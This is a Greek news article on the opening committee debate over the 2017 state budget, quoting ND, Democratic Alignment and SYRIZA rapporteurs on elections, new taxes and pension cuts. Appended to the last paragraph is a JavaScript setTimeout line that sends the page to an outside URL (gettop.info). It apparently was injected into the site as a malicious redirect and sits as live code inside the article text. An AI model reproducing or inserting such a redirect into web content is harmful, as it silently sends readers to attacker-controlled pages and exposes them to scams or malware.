Αντιπαράθεση στη Βουλή για τον προϋπολογισμό

0
7

 

Ξεκίνησε η συζήτηση του κρατικού προϋπολογισμού για το 2017 στη διαρκή επιτροπή Οικονομικών Υποθέσεων της Βουλής.

Με το καλημέρα υπήρξε αντιπαράθεση στη Βουλή καθώς ο εισηγητής της ΝΔ Κωστής Χατζηδάκης έθεσε και πάλι αίτημα εκλογών. Απευθυνόμενος στην ηγεσία του υπουργείου Οικονομικών, ο κ. Χατζηδάκης είπε: «Θα το δείτε ότι στο τέλος ακόμα κι αν η ΝΔ σας παρακαλάει να μην κάνετε εκλογές, θα κάνετε ηρωική έξοδο για να περιορίσετε την ήττα σας και να διασωθείτε. Κάντε το όμως όσο πιο γρήγορα γίνεται. Θα είναι καλό για την πατρίδα».

Επικεντρώθηκε επιπλέον στο χαμένο οκτάμηνο Βαρουφάκη υποστηρίζοντας ότι «τα έτη 2015-2016 ήταν έτη οπισθοδρόμησης τα οποία κόστισαν 15.000 ευρώ σε κάθε ελληνικό νοικοκυριό και ύψωσε ασπίδα προστασίας στην διακυβέρνηση Σαμαρά. Ακόμα κι αν επιτευχθούν όλα τα θετικά σενάριά σας, το μόνο που θα καταφέρετε θα είναι να επιστρέψουμε στο 2014. Ακόμα κι έτσι όμως στην καμπούρα της ελληνικής οικονομίας θα υπάρχει τεράστιο κόστος. Αν βγούμε σήμερα στις αγορές θα πληρώσουμε επιτόκιο μεγαλύτερο από το Βιετνάμ για το δεκαετές ομόλογο. Ενώ επιτίθεστε στον Σαμαρά για το 2014 , τώρα επιχειρείτε να μας ξαναφέρετε εκεί».

Η πολιτική της κυβέρνησης έχει «διώξει» χιλιάδες επιχειρήσεις από τη χώρα, είπε ο εισηγητής της ΝΔ ενώ υπογράμμισε ότι η κυβέρνηση «δουλεύει ψιλό γαζί» τους ψηφοφόρους της όταν μιλά για κοινωνική δικαιοσύνη και κοινωνικό πρόσημο του προϋπολογισμού.

Εκ μέρους της Δημοκρατικής Συμπαράταξης ο κ. Γιάννης Κουτσούκος υπογράμμισε πως «ό,τι κατέκτησε ο λαός με δικούς του κόπους και θυσίες σε μια πεντάχρονη πορεία ανατράπηκε από την τυχοδιωκτική πολιτική των ψεμάτων και των αυταπατών και μαζί της ανατράπηκε και η προοπτική εξόδου από την κρίση και τα μνημόνια. Ο προϋπολογισμός σωρεύει τα λάθη της κυβέρνησης. Το τρίτο μνημόνιο έγινε με συνθήκες υποταγής φορολογικών μέτρων 12,5 δισ. ευρώ και ταπείνωσης με την εκχώρηση όλης της δημόσιας περιουσίας στο υπερταμείο».

Ο εισηγητής του ΣΥΡΙΖΑ κ. Χρήστος Μπγιάλας έκανε λόγο για στόχο επίτευξης ανάπτυξης 2,7% εντός του 2017: «Ο προϋπολογισμός δίνει το μήνυμα μιας νέας πορείας για τη χώρα. Αρχίζει η ανοδική πορεία».

«Η φορολογική αφαίμαξη για την επίτευξη του πλεονάσματος του 2016 υπερβαίνει τα 3,8 δισ. ευρώ αν υπολογίσει κανείς την υστέρηση εσόδων» επεσήμανε ο κ. Κουτσούκος και συμπλήρωσε: «Το πλεόνασμα δεν έχει σχέση με την ανάπτυξη καθώς είχαμε ύφεση. Αρα οφείλεται σε μέτρα προσαρμογής με έμμεσους και άμεσους φόρους. Πόσο αριστερή είναι μια τέτοια πολιτική; Το κρίνουν οι πολίτες και όσοι εξαπατήθηκαν με τα περί αύξησης του κατώτατου μισθού κλπ.. Τα ίδια χαρακτηριστικά έχει και ο νέος προϋπολογισμός. Σύμφωνα με την αιτιολογική έκθεση προβλέπονται 4 δισ. ευρώ εξοικονομήσεις εκ των οποίων τα 3,1 δισ. ευρώ έσοδα και 900 χιλ από δαπάνες. Από τα 3,1 δισ. ευρώ των δημοσιονομικών παρεμβάσεων στα έσοδα τα 2,6 δισ. ευρώ είναι νέοι φόροι που θα ισχύσουν από 1.1.2017 που θα την πληρώσει το σύνολο χαμηλόμισθων στρωμάτων και όχι μεγαλοβιομήχανοι. Έχουμε δηλαδή περαιτέρω μείωση αφορολόγητου, φόρο σε ζύθο, τηλεφωνία, καφέ αύξηση ΦΠΑ στο 24% κ.α. Τα 960 χιλ περικοπές δαπανών για το 2017 προκύπτουν από νέες περικοπές συντάξεων και κοινωνικών επιδομάτων. Η δήθεν κυβέρνηση της Αριστεράς κόβει ακόμα και τις συντάξεις χηρείας. Ο δρόμος της πολιτικής ερήμου που βαδίζει οδηγεί στον υποκατώτατο μισθό, την απελευθέρωση των απολύσεων και στο τέταρτο μνημόνιο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here